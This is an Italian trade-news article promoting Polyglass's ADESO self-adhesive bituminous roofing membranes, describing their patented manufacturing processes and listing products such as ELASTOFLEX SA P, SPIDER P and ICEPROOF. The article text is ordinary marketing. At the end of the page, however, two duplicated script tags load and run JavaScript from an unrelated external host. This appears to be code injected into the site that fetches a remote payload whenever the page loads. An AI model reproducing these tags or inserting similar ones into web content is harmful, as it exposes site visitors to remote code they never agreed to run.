1. Home
  2. Notizie e Mercato
  3. ADESO, la nuova tecnologia brevettata da Polyglass per le membrane autoadesive

ADESO, la nuova tecnologia brevettata da Polyglass per le membrane autoadesive

Sistema tetto di
5/5
votato da 1 persone
Le caratteristiche principali dei prodotti della nuova gamma sono un alto grado di sicurezza, versatilità e sostenibilità ambientale


Le membrane autoadesive con tecnologia ADESO® rispondono alle necessità di sicurezza, velocità di realizzazione e versatilità d'uso tipiche delle tecnologie costruttive moderne. La tecnologia ADESO® è un concetto innovativo – protetto da diversi brevetti internazionali - di produzione delle membrane autoadesive a doppio compound che utilizzano una mescola APP, SBS o TPO nel lato superiore esposto agli agenti atmosferici, ed una mescola altamente autoadesiva nel lato inferiore dell’armatura di rinforzo.

Le membrane della gamma sono: ELASTOFLEX SA P, ELASTOFLEX SA P Granigliata, ELASTOFLEX SA P AF, ELASTOFLEX SA P AF Granigliata SPIDER P, SPIDER P Granigliata, POLYVAP SA, ADESOSHIELD SA, POLYSTICK TU PLUS, ADESOGUARD, ICEPROOF  e ICEPROOF Granigliata.

La loro applicazione è sicura in quanto avviene senza l’uso della fiamma; i dettagli o le zone non adesive possono comunque essere trattate con leister ad aria calda, mastice o sfiammatura tradizionale.

Possono essere impiegate su tutte le superfici da impermeabilizzare, a condizione che esse siano pulite, asciutte e prive di umidità. Sono particolarmente indicate per essere applicate sopra i pannelli isolanti sensibili alla fiamma (es. polistirene espanso o estruso, polierutano). Sono tuttavia da evitare i pannelli fibrosi o particolarmente polverosi. Le membrane possono essere posate anche su pannelli verticali.

Caratteristica importante è l’applicazione a basso consumo energetico – e quindi a bassa emissione di CO2 - ossia la posa a freddo dei teli, senza fusione della mescola, che consente un risultato estetico finale eccellente, particolarmente apprezzabile con membrane ardesiate chiare (es. bianco).

Le membrane autoadesive ADESO® rispettano l'ambiente. Durante l’applicazione non producono fumi, odori e rumori.

CARATTERISTICHE DISTINTIVE DELLA TECNOLOGIA ADESO® 

Sistema di produzione “MVACC” (Multiple Variable Advanced Compound Coating)
Permette l’applicazione di due diverse mescole: mescola APP, SBS o TPO sulla faccia superiore, e mescola autoadesiva nella superficie inferiore.

FASTLap®
Processo di produzione brevettato per la realizzazione di membrane autoprotette con graniglie minerali e aree di sovrapposizione (cimose) longitudinali e trasversali libere da graniglia. La tecnologia brevettata da Polyglass elimina il rischio di sovrapposizioni inaffidabili, grazie alla presenza di una particolare pellicola asportabile che permette di avere le zone di sovrapposizione libere da graniglia e permette di ridurre in modo significativo il tempo ed il lavoro necessario per realizzare sovrapposizioni perfette e sicure.

SEALLap®
Esclusivo trattamento industriale per rendere autoadesive le cimose di sovrapposizione longitudinali e trasversali.

MSS Varie Finiture Superficiali
Processo di produzione flessibile che facilita l’applicazione di una varietà di superfici personalizzabili per risolvere un’ampia gamma di soluzioni di copertura.

I PRODOTTI AUTOADESIVI CON TECNOLOGIA ADESO®:
 
ELASTOFLEX SA P - ELASTOFLEX SA P Granigliata
Membrane bituminose prefabbricate autoadesive di ottima qualità, realizzate con un compound elastomerico (SBS), ed armate con un tessuto non tessuto di poliestere da fiocco, rinforzato e stabilizzato con fili di vetro longitudinali. Tale armatura conferisce al prodotto un’eccellente stabilità dimensionale, ottime prestazioni meccaniche e una buona lavorabilità in cantiere. ELASTOFLEX SA P ha la faccia superiore protetta da un film in polietilene, mentre nella versione granigliata la faccia superiore è autoprotetta con uno strato uniforme di scaglie di ardesia naturale o colorata.

Nella parte superiore, oltre all’innovativa cimosa di testa FASTLap®, le membrane con finitura granigliata presentano anche il trattamento SEALLap®, ovvero un ulteriore trattamento autoadesivo sulla faccia superiore delle cimosa. Tale trattamento  garantisce eccellenti adesioni delle membrane anche nelle situazioni più difficili. ELASTOFLEX SA P ed ELASTOFLEX SA P Granigliata hanno la parte inferiore adesiva protetta con un film di polietilene monosiliconato da asportare al momento della posa in opera.

SPIDER P - SPIDER P Granigliata
Membrane bituminose prefabbricate autoadesive di ottima qualità, realizzate con un compound elastoplastomerico (APP), e armate con un tessuto non tessuto di poliestere da fiocco, rinforzato e stabilizzato con fili di vetro longitudinali. Tale armatura conferisce al prodotto un’eccellente stabilità dimensionale, ottime prestazioni meccaniche e una buona lavorabilità in cantiere.

SPIDER P ha la faccia superiore protetta da un film in polietilene, mentre nella versione granigliata la faccia superiore è autoprotetta con uno strato uniforme di scaglie di ardesia naturale o colorata. Nella parte superiore, oltre all’innovativa cimosa di testa FASTLap®, le membrane con finitura granigliata presentano anche il trattamento SEALLap®, ovvero un ulteriore trattamento autoadesivo sulla faccia superiore delle cimosa. Tale trattamento garantisce eccellenti adesioni delle membrane anche nelle situazioni più difficili. SPIDER P e SPIDER SA P Granigliata hanno la parte inferiore adesiva protetta con un film di polietilene monosiliconato da asportare al momento della posa in opera.

POLYSTICK TU PLUS
Membrana bituminosa prefabbricata autoadesiva di ottima qualità, impermeabilizzante, con un’armatura in velo di vetro rinforzato. Le elevate proprietà meccaniche sono dovute al tessuto di poliestere posto sulla faccia superiore. La membrana è destinata ad essere usata come sottotegola o sottocoppo. Le tegole possono essere poi essere applicate direttamente mediante collanti o malte.

Con pendenze superiori al 30%, POLYSTICK TU PLUS deve essere applicata anche con sistemi di fissaggio meccanico sotto le sovrapposizioni. Il prodotto è dotato delle innovative cimose di sovrapposizione autoadesive SEALLap®,  che garantisce eccellenti adesioni delle membrane anche nelle situazioni più difficili.

POLYVAP SA
Membrana bituminosa di ottima qualità, realizzata da uno speciale compound elastomerico (SBS) autoadesivo, armata con un film di alluminio. L’armatura conferisce al prodotto un’eccellente stabilità dimensionale, buone caratteristiche meccaniche, assoluta barriera al vapore e un’ottima lavorabilità in cantiere.
POLYVAP SA ha entrambe le facce protette con un film di polietilene monosiliconato da asportare al momento della posa in opera.

ADESOSHIELD SA
Membrana bituminosa prefabbricata biadesiva di ottima qualità, realizzata con un compound elastomerico adesivo (SBS) ed armata con un tessuto non tessuto di poliestere da fiocco, rinforzato e stabilizzato con fili di vetro longitudinali. Tale armatura conferisce al prodotto un’eccellente stabilità dimensionale, ottime prestazioni meccaniche e una buona lavorabilità in cantiere.
ADESOSHIELD SA ha entrambe le facce protette con film di polietilene monosiliconato da asportare al momento della posa in opera.

ADESOGUARD
Membrana autoadesiva rinforzata con un film in polietilene ad alta densità HDPE, specifica per impermeabilizzazione di muri in elevazione e fondazioni.
ADESOGUARD è realizzata con un compound elastomerico (SBS), armata con velo di vetro rinforzato e accoppiata, sulla faccia superiore, ad un film di polietilene ad alta densità HDPE, che gli conferisce una maggiore resistenza meccanica verso l’esterno, particolarmente utile in fondazione, nelle impermeabilizzazioni in elevazione (muri contro terra, acqua di percolamento) o come antiumido sotto pavimento.

ICEPROOF e ICEPROOF Granigliata
Sono realizzate con un compound elastomerico (SBS), additivato con speciali resine promotrici dell’adesione ed armate con un tessuto non tessuto di poliestere da fiocco, rinforzato e stabilizzato con fili di vetro longitudinali.
La flessibilità a freddo – 35 ° C e i valori di peeling molto alti (≥40 N/10mm a +23 °C e ≥20 N/10mm a +5°C) rendono possibile l’applicazione di queste membrane anche con climi freddi.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>